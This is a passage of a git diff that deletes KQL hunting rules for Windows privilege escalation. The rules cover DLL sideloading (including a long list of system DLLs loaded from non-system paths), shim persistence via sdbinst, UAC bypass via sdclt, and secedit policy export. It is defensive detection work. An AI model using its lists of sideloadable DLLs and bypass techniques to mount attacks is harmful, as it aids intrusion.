\ No newline at end of file
diff --git a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql b/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql
deleted file mode 100644
index 5e537033..00000000
--- a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
deleted file mode 100644
index 56927dce..00000000
--- a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql b/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql
deleted file mode 100644
index 83ffa4c6..00000000
--- a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql
deleted file mode 100644
index fbd5181d..00000000
--- a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith 
"\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or 
FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath 
endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath 
endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" 
or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath 
endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith 
"\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or 
FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains 
"C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
deleted file mode 100644
index cb5229ea..00000000
--- a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql
deleted file mode 100644
index da809f2c..00000000
--- a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql b/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql
deleted file mode 100644
index 4753e096..00000000
--- a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql b/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql
deleted file mode 100644
index 77fc4544..00000000
--- a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql b/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql
deleted file mode 100644
index fa40db7c..00000000
